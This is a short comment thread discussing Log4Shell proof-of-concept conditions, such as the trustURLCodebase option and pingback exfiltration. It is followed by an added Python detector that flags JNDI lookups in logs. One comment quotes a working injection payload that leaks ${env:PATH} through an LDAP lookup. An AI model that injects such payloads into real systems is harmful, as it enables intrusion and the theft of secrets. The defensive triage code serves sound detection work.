by brasetvik 1655 days ago
That's good clarification, thanks.

I got the POC to RCE with `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true` seeming sufficient.

While still not great, I'd expect that to meaningfully reduce the severity for most, as that seems a pretty … odd option to enable.

1 comments

If you check the argument, one is for RMI and the other is for LDAP; if your PoC uses LDAP then you need the LDAP one, else RMI, etc. But yes, most people probably don't have this enabled, so the only concern is a pingback in modern Java.
Pingback can also include variable contents, so it's not just "they can get the IPs", but also potentially secrets and such.
Yeah, `${jndi:ldap://127.0.0.1:1389/o=${env:PATH}}`
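
For defenders triaging logs in light of the comments above, the following added example (not part of the thread) finds `${jndi:...}` lookups in log lines and reports which nested lookups, such as `${env:PATH}`, would have been expanded into the outbound request. The function names and sample log lines are constructed for illustration, and it matches only the literal `${jndi:` form quoted in the thread.

```python
import re

# Nested lookups such as ${env:PATH} embedded inside a JNDI URL.
NESTED = re.compile(r"\$\{([a-zA-Z]+):([^${}]+)\}")

def top_level_lookups(text):
    """Yield the body of each outermost ${...} expression, honouring nesting."""
    i = 0
    while True:
        start = text.find("${", i)
        if start == -1:
            return
        depth, j = 0, start
        while j < len(text):
            if text.startswith("${", j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    yield text[start + 2:j]
                    break
            j += 1
        else:
            return  # unbalanced braces: nothing more to extract
        i = j + 1

def triage(line):
    """Return one finding per JNDI lookup: its scheme and any nested lookups."""
    findings = []
    for body in top_level_lookups(line):
        if not body.lower().startswith("jndi:"):
            continue
        url = body[len("jndi:"):]
        scheme = url.split(":", 1)[0].lower()
        leaks = [f"{prefix.lower()}:{key}" for prefix, key in NESTED.findall(url)]
        findings.append({"scheme": scheme, "leaks": leaks})
    return findings

# Constructed sample log lines (not taken from any real system).
SAMPLE = [
    "12:00:01 INFO ua=${jndi:ldap://127.0.0.1:1389/o=${env:PATH}}",
    "12:00:02 INFO ua=${jndi:rmi://127.0.0.1:1099/x}",
    "12:00:03 INFO login ok user=alice home=${env:HOME}",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(triage(line), "<-", line)
```

A finding with a non-empty `leaks` list marks a request where variable contents, not just the source IP, may have left the host, which is the case to prioritise for secret rotation.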